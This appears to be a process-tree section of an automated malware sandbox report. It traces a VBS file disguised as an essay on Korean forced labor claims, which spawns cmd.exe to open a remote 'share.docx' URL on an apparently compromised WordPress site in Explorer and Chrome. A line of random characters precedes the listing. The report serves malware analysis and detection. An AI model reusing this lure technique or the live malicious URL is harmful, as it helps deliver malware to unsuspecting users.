!o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Target ID:	0
Start time:	08:23:59
Start date:	20/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Essay on Resolution of Korean Forced Labor Claims.vbs"
Imagebase:	0x7ff7cab20000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	1
Start time:	08:23:59
Start date:	20/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
Imagebase:	0x7ff74ffc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	08:23:59
Start date:	20/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	08:23:59
Start date:	20/04/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	08:23:59
Start date:	20/04/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	08:24:00
Start date:	20/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	7
Start time:	08:24:01
Start date:	20/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2036,i,652845326045474574,16795533122018123490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false